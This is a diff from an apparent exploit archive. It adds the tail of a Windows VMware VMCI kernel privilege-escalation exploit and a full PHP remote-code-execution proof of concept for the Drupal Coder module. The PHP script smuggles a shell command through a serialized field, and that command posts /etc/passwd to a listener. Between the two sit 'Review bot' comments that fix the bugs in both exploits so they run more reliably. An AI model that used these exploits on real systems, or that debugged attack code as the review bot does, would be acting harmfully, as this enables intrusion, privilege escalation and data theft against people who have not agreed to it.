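+PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
+PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
+PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
+PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);
+if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
+{
+SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
+}
+PoolSpray();
+if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
+{
+printf("\t[!] If you don't see any BSOD, you're successful\n");
+if (b7 || b8)
+{
+ResumeThread(hSuspThread);
+}
+}
+else
+{
+printf("[-] Not this time %d\n", GetLastError());
+}
+if (pShellSprayBufStd != NULL)
+{
+VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
+}
+if (pShellSprayBufQtd != NULL)
+{
+VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
+}
+}
+SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
+CloseHandle(hVMCIDevice);
+}
+else
+{
+printf("[-] Like I don't see vmware here\n");
+}
+CloseHandle(hProcessToElevate);
+return;
+}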
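Review bot: The allocation check in PenetrateVMCI tests `pShellSprayBufQtd` four times instead of the four distinct spray buffers, so a failed `VirtualAlloc` of `pShellSprayBufStd`, `pShellSprayBufStd7` or `pShellSprayBufQtd7` goes unnoticed, InitFakeBuf/PlaceFakeObjects silently skip the NULL region, and the IOCTL is then issued with an incomplete spray, which most likely produces the BSOD the success message warns about instead of the intended "try running the app again" exit; it should read `if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL))`. The cleanup after the IOCTL frees only the Std and Qtd buffers, leaking `pShellSprayBufStd7` and `pShellSprayBufQtd7` (0x2000000 bytes each), and the early-return path after a failed check releases none of the regions that did succeed, so both paths should `VirtualFree` whichever of the four pointers is non-NULL. PoolSpray leaves `dwSemaphoreSize` at 0 when `LOBYTE(GetVersion())` is neither 5 nor 6 and `0x218 / dwSemaphoreSize` then divides by zero; an `if (dwSemaphoreSize == 0) { return; }` after the version switch makes the unsupported-OS case fail cleanly. As listed, the file references `EscalatePrivileges`, `InitKernelFuncs`, `hProcessToElevate` and the `PVM_REQUEST`/`PSYSTEM_HANDLE_INFORMATION_EX` types without defining or including them, so it is a partial PoC rather than a buildable unit and a header comment saying so would save readers a compile attempt.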

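--- a/platforms/php/remote/40144.php
+++ b/platforms/php/remote/40144.php
@@ -0,0 +1,29 @@
+<?php
+# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
+# https://www.drupal.org/node/2765575
+# by Raz0r (http://raz0r.name)
+#
+# E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5
+$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
+$host = "http://localhost:81/drupal-7.12/";
+$a = array(
+"upgrades" => array(
+"coder_upgrade" => array(
+"module" => "color",
+"files" => array("color.module")
+)
+),
+"extensions" => array("module"),
+"items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
+"paths" => array(
+"modules_base" => "../../../",
+"files_base" => "../../../../sites/default/files"
+)
+);
+$payload = serialize($a);
+file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));
+?>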
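Review bot: The base64 payload is appended to the query string without URL encoding, so any `+` in `base64_encode($payload)` is decoded as a space when the target parses `$_GET['file']`, corrupting the serialized array the `data://` URL carries; the request line should use `. urlencode(base64_encode($payload))` in place of `. base64_encode($payload)`. Whether the default `$cmd`/`$host` values happen to yield a `+`-free encoding is a matter of luck, so the bug is latent rather than certain for these defaults but bites as soon as either string is changed. The result of `file_get_contents` is also discarded, so a wrong module path, a 4xx/5xx, or a target where `allow_url_fopen` is off (which the `data://` wrapper is subject to, assuming the target script reads the URL with a stream function) fails silently; capturing it as `$r = file_get_contents(...);` followed by `if ($r === false) { fwrite(STDERR, "request failed\n"); exit(1); }` makes the failure visible. `$host` already ends in `/` and the appended path starts with `/`, which yields a harmless `//` but is worth trimming with `rtrim($host, '/')`.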